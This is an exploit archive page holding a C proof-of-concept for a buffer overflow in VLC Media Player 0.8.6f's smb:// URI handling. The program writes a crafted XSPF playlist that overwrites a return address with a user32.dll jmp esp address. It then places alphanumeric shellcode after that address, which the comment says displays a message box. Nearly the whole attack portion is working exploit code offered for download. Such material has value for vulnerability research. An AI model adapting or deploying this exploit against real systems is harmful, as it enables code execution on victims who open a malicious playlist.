exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VLC 0.8.6f smb:// Buffer Overflow

VLC 0.8.6f smb:// Buffer Overflow
Posted Aug 5, 2009
Authored by Pankaj Kohli | Site pank4j.com

VLC Media Player version 0.8.6f smb:// URI handling remote buffer overflow exploit.

tags | exploit, remote, overflow
SHA-256 | aa0ab9f8122e71e917d958544e691d58e011aff7c532a2f6f79c89ad0366900e

VLC 0.8.6f smb:// Buffer Overflow

Change Mirror Download
/*  VLC Media Player 'smb://' URI Handling Remote Buffer Overflow Vulnerability Exploit
* Reference: http://www.securityfocus.com/bid/35500
*
* Tested on VLC media player 0.8.6f on WinXP SP3
*
* Coded by Pankaj Kohli
* http://www.pank4j.com
*
*/

#include <stdio.h>
#include <string.h>

// ASCII shellcode (Display a message box & exit)
unsigned char shell[] = "TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkOjpJHIvKOYokObPPwRN1uqt5PA";

long jmp = 0x7E485233; // jmp esp (user32.dll)

int main(int argc, char **argv) {
char buff[512], *p;
FILE *fp;
int i;
long *ptr;

fp = fopen("sploit.xspf", "wb");
fprintf(fp, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n");
fprintf(fp, "<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n");
fprintf(fp, "\t<title>Playlist</title>\n");
fprintf(fp, "\t<trackList>\n");
fprintf(fp, "\t\t<track>\n");
fprintf(fp, "\t\t\t<location>smb://example.com@www.example.com/foo/#{");

printf("[*] Creating buffer\n");
for(i=0; i<300; i++) {
buff[i] = 'a' + ((i/4)%26);
}
ptr = (long *) (buff + 96);
*ptr = jmp;
for(i=0; i<strlen((const char *) shell); i++) {
buff[i+100] = shell[i];
}
buff[300] = 0;
fprintf(fp, "%s", buff);

fprintf(fp, "}</location>\n");
fprintf(fp, "\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
fprintf(fp, "\t\t\t\t<vlc:id>0</vlc:id>\n");
fprintf(fp, "\t\t\t</extension>\n");
fprintf(fp, "\t\t</track>\n");
fprintf(fp, "\t</trackList>\n");
fprintf(fp, "</playlist>\n");
fclose(fp);

printf("[*] Exploit file written to sploit.xspf\n");

return 0;
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close